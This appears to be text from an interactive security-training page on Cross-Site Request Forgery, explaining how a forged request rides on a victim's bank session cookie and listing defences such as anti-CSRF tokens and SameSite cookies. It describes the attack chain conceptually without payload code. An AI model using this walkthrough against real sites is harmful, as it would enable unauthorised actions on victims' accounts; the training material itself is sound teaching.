CSRF

Force authenticated users to execute unwanted actions. State-changing attacks.

📖 Theory Panel Active

Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to execute unwanted actions on a web application. The attacker tricks the victim's browser into making malicious requests using their existing authentication cookies.

How it works:

  • • Victim logs into a trusted site (bank.com)
  • • Victim visits attacker-controlled site while still authenticated
  • • Attacker's site triggers forged request to bank.com
  • • Browser automatically includes victim's cookies
  • • Server accepts request as legitimate

📡 Interactive Simulation Mode

More common, requires form submission

Vulnerable application

Attack Console

Ready to Attack

Victim's Banking Session

Session Status:Authenticated
Account Balance:$5,000
Cookie: SESSIONID=user_authenticated_789

CSRF Protection Status

No CSRF Token
State-changing requests not protected
No SameSite Cookie Attribute
Cookies sent with cross-origin requests
No Referer Check
Origin of requests not validated
Defense Best Practices
  • • Use cryptographically secure anti-CSRF tokens
  • • Set SameSite=Strict or SameSite=Lax on cookies
  • • Validate Origin/Referer headers
  • • Require re-authentication for sensitive actions
  • • Use custom headers for AJAX requests (X-Requested-With)
  • • Never use GET for state-changing operations

CSRF Attack Chain

1.
Victim Authenticated:

User logs into bank.com (session cookie stored)

2.
Deliver Malicious Request:

Via email

3.
Browser Sends Request:

Automatically includes authentication cookie

4.
Server Accepts:

No CSRF token validation, request processed

OPSEC: Training Environment Only

CSRF attacks are illegal without authorization. Always implement anti-CSRF tokens, SameSite cookies, and origin validation. Never use GET for state-changing operations. OWASP Top 10 vulnerability.